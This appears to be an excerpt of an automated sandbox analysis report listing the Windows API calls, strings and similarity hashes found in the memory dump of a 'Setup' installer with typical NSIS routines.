  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
• FreeLibrary.KERNEL32(00000000), ref: 00406500
• GlobalFree.KERNEL32(?), ref: 00406509
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
• API String ID: 20674999-2124804629
• Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
• Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
• Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
• Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
• GetDlgItem.USER32(?,000003E8), ref: 004041AD
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
• GetSysColor.USER32(?), ref: 004041DB
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
• lstrlenW.KERNEL32(?), ref: 00404202
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
• GetDlgItem.USER32(?,0000040A), ref: 00404276
• SendMessageW.USER32(00000000), ref: 0040427D
• GetDlgItem.USER32(?,000003E8), ref: 004042AA
• SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
• LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
• SetCursor.USER32(00000000), ref: 004042FE
• ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
• LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
• SetCursor.USER32(00000000), ref: 00404322
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
• String ID: F$N$open
• API String ID: 3928313111-1104729357
• Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
• Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
• Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
• Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
APIs
• lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
• CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
• GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
• GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
• WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
• WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
• wsprintfA.USER32 ref: 00406B79
• GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                              • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                              • API String ID: 565278875-3368763019
                                                                                                                                                                              • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                              • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                              • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                              • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010D8
• FillRect.USER32(00000000,?,00000000), ref: 004010ED
• DeleteObject.GDI32(?), ref: 004010F6
• CreateFontIndirectW.GDI32(?), ref: 0040110E
• SetBkMode.GDI32(00000000,00000001), ref: 0040112F
• SetTextColor.GDI32(00000000,000000FF), ref: 00401139
• SelectObject.GDI32(00000000,?), ref: 00401149
• DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
• SelectObject.GDI32(00000000,00000000), ref: 00401169
• DeleteObject.GDI32(?), ref: 0040116E
• EndPaint.USER32(?,?), ref: 00401177
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
• Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
• Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
• Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
APIs
• RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
• lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
• RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
• RegCloseKey.ADVAPI32(?), ref: 004029E4
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
• WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
• WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
• WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
• WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
• WriteReg: error creating key "%s\%s", xrefs: 004029F5
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: lstrlen$CloseCreateValuewvsprintf
• String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
• API String ID: 1641139501-220328614
• Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
• Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
• Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
• Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
APIs
• CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
• GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
• WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
• lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
• WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
• String ID: @bG$RMDir: RemoveDirectory invalid input("")
• API String ID: 3734993849-3206598305
• Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
• Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
• Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
• Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
• GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
• WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
• GlobalFree.KERNEL32(00000000), ref: 00402F17
• CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
• DeleteFileW.KERNEL32(?), ref: 00402F56
Strings
• created uninstaller: %d, "%s", xrefs: 00402F3B
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Global$AllocFileFree$CloseDeleteHandleWrite
• String ID: created uninstaller: %d, "%s"
APIs
• GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427D76,759223A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
• FreeLibrary.KERNEL32(?,?), ref: 004024C3
Strings
• `G, xrefs: 0040246E
• Error registering DLL: Could not initialize OLE, xrefs: 004024F1
• Error registering DLL: %s not found in %s, xrefs: 0040249A
• Error registering DLL: Could not load %s, xrefs: 004024DB
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
• String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00403E10
• GetSysColor.USER32(00000000), ref: 00403E2C
• SetTextColor.GDI32(?,00000000), ref: 00403E38
• SetBkMode.GDI32(?,?), ref: 00403E44
• GetSysColor.USER32(?), ref: 00403E57
• SetBkColor.GDI32(?,?), ref: 00403E67
• DeleteObject.GDI32(?), ref: 00403E81
• CreateBrushIndirect.GDI32(?), ref: 00403E8B
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427D76,759223A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
• GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
Strings
• Exec: command="%s", xrefs: 00402241
• Exec: failed createprocess ("%s"), xrefs: 004022C2
• Exec: success ("%s"), xrefs: 00402263
Memory Dump Source
• Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                              • API String ID: 2014279497-3433828417
                                                                                                                                                                              • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                              • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                              • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                              • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                              • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                              Strings
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
• Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
• Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
• Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
• MulDiv.KERNEL32(0003D800,00000064,046024F0), ref: 00403295
• wsprintfW.USER32 ref: 004032A5
• SetWindowTextW.USER32(?,?), ref: 004032B5
• SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
Strings
• verifying installer: %d%%, xrefs: 0040329F
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
• Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
• Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
• Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
• CharNextW.USER32(?,?,?,00000000), ref: 004060D6
• CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
• CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
Strings
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
• Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
• Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
• Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
• Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
• RegCloseKey.ADVAPI32(?), ref: 00401504
• RegCloseKey.ADVAPI32(?), ref: 00401529
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
• Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
• Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
• Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
• Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
APIs
• GetDlgItem.USER32(?), ref: 004020A3
• GetClientRect.USER32(00000000,?), ref: 004020B0
• LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
• SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
• DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                              • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                              • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                              • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                              • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                              • String ID: !
